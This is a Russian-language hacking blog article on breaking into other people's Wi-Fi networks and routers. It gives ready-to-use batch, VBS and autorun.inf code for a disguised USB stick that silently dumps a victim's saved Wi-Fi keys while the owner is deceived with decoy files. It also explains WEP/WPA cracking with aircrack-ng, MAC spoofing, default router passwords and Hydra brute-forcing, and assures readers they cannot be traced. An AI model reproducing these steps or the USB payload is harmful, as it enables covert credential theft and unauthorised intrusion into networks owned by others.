В гостях у Lazorg'a

Вступление
Сейчас очень распространены wi-fi сети, выйдя на улицу с ноутбуком можно найти до 20-30 сетей (гденибудь в центре города). Если вы читаете эту статью вас наверняка заинтересовала возможность взлома таких сетей. Здесь я напишу об этом максимально подробно.

Типы сетей и протоколы защиты
Для начала скажу что сети бывают открытыми и защищенными. Открытые сети не требуют специального ключа для авторизации, такие сети можно встретить в публичных местах. Например в СПБ почти в каждом “Макдональдсе” есть бесплатная wi-fi сетка. Защищенные сети могут иметь разные протоколы защиты. Существует несколько таких протоколов: Wep, WPA, WPA-2PSK. В протоколе WEP чаще всего пароль для авторизации состоит из 5 символов, в остальных протоколах длина паролей достигает 8-9.

Обзор необходимого софта
Для взлома Wi-Fi сетей часто используют следующие программы
aircrack-ng (самый полезный инструмент скачать тут)
inSSiDER (мониторинг wi-fi сетей)
CommView Wifi (главная программа для взлома сетей под windows, скачать тут)
Netstumbler (мониторинг)
WirelessKeyView (вытаскивание ключей из системы)

и другие программы

С чего начать взлом wi-fi?
Во первых надо определится где примерно находится wi-fi точка, еще лучше если у вас есть доступ к компьютеру который подключен к этой сети. В этом нам поможет утилита WirelessKeyView. Программа выводит все сохраненные в памяти компьютера ключи для wifi сетей. Ее можно запускать через gui а можно через консоль. В случае если хозяин такого компьютера может чтото заподозрить нужно использовать следующую схему. Нам понадобится флешка, на ней в корневой директории создаем “невинную” папку, создаем файл main.bat, скрипт для невидимого выполнения script.vbs, autorun.inf и конечноже саму программу wirelesskeyview.exe (Скачать тут). Еще нам понадобится иконка для флешки (например иконка виндовской папки)
В батнике прописывем следующее
WirelessKeyView.exe /stab >> keys.txt
exit
В vbs скрипте прописываем следующее
Set WshShell = CreateObject ("WScript.Shell")
WshShell.Run "cmd.exe /c main.bat", 0, false
В autorun.inf пишем следующее
[AutoRun]
UseAutoPlay=1
open=script.vbs
ICON=icon.ico
(в место icon.ico – иконка папки)
Вот и все, флешка готова, теперь кидаем в невинную папку какиенибудь файлы – чтобы показать их хозяину компа. На виду у хозяина мы два раза кликаем по нашей флешке(выполняется скрипт)
А потом правой кнопкой открываем папку в проводнике и показываем ему файлы из невинной папки =) после этого мы приходим домой заходим на флешку и смотрим содержимое файла keys.txt – там будут все wifi ключи хозяина того компьютера.

Удаленный Взлом Wifi
Вот здесь и начинается самое интересное)
Каждый протокол защиты нужно взламывать по своему, wep взломать довольно легко, нужно только насобирать побольше пакетов.

Backtrack 3

Самый удобный на мой взгляд путь взлома wifi это использование ОС backtrack 3 или 4
Это очень удобный хакерский live-cd дистрибутив – при помощи него можно взламывать wifi сети
Для начала нам надо его установить. Ищем в интернете .iso образ backtrack 3 или после скачивания записываем образ на диск и грузимся с него. Я не буду много расписывать об использовании этого дистрибутива – лучше посмотрите отличный видеоурок ссылка
Wpa2 нужно брутить с помощью aircrack-ng, для этого может понадобится программа powerfulgenerator чтобы создать листы восьмизначных цифровых паролей.
От себя добавлю что wep взламывается точно также, только для этого надо собрать не один пакет а около 10000. Для этого нужно заставить wifi точку отсылать большое количество iv пакетов с помощью утлиты aireplay-ng (она входит в состав aircrack-ng), после этого сохраненные пакеты нужно обработать с помощю aircrack-ng и если повезет мы получим нужный нам ключ.

Взлом wifi под другими системами
Пакет aircrack-ng можно установить на любую linux систему, например на ubuntu. Для тех кто сидит под Windows стандартный сниффер airodump-ng не подойдет, по этому нужно использовать связку CommView wifi + aircrack-ng. С помощью утилиты CommView можно собирать wifi пакеты а с помощью aircrack-ng взламывать пароли. По этой теме есть много мануалов в интернете, расписывать здесь про это не вижу смысла. Скажу только что под виндой возможно придется переписывать драйвера вайфай-карты, что вообщем-то может вызвать бсод или еще что-нибудь подобное, поэтому настоятельно рекомендую использовать linux – там все проще и надежней =D

Общие рекомендации ко взлому wifi
Для сбора пакетов может понадобиться много времени – по этому для работы нужен ноутбук с большой емкостью аккумулятора.
Многие спрашивают, возможно-ли узнать кто взломал wifi сеть, мой ответ – нет практически невозможно. Чтобы найти атакующего нужен очень точный анализатор частот, да и собственно сама атака на сеть выглядит практически незаметно для обычного пользователя (разве что может быть дисконнект или снижение скорости интернет траффика)

Существуют и другие полезные программы для работы с беспроводными сетями, например kismet, inSSIDer, Vistumbler(netstumbler), CommView for wifi, итд. Для анализа пакетов можно использовать сниффер wireshark, если вы подключены к сети или переведите вайфай карту в режим мониторинга и собирайте все пакеты в эфире =D

На некоторых беспроводных роутерах стоит защита от подключения – фильтрация mac адреса. Эту защиту можно обойти если узнать мак адрес клиентского компьютера, а потом подменить свой адрес на адрес клиента.

Собирать информацию можно и со смартфона. Под symbian есть barbelo, под вендавс-мобайл есть вродебы даже свой сниффер пакетов

Проникновение на роутер

Большинство беспроводных роутеров имеют удобную веб-админку, которая обычно находится по адресу 192.168.0.1. Первое что обычно проверяет хакер в таком случае – попробовать авторизоваться с логином и паролем “admin”(Это дефолтный пароль, и очень часто он оказывается правильным). В принципе если этот пароль не подошел, можно попробовать побрутить пароль с помощью гидры или похожего софта. Иногда на точках открыт доступ в админку по SSH.

Статью написал Deamon.32 http://d7x.ru | При копировании ссылка на d7x.ru обязательна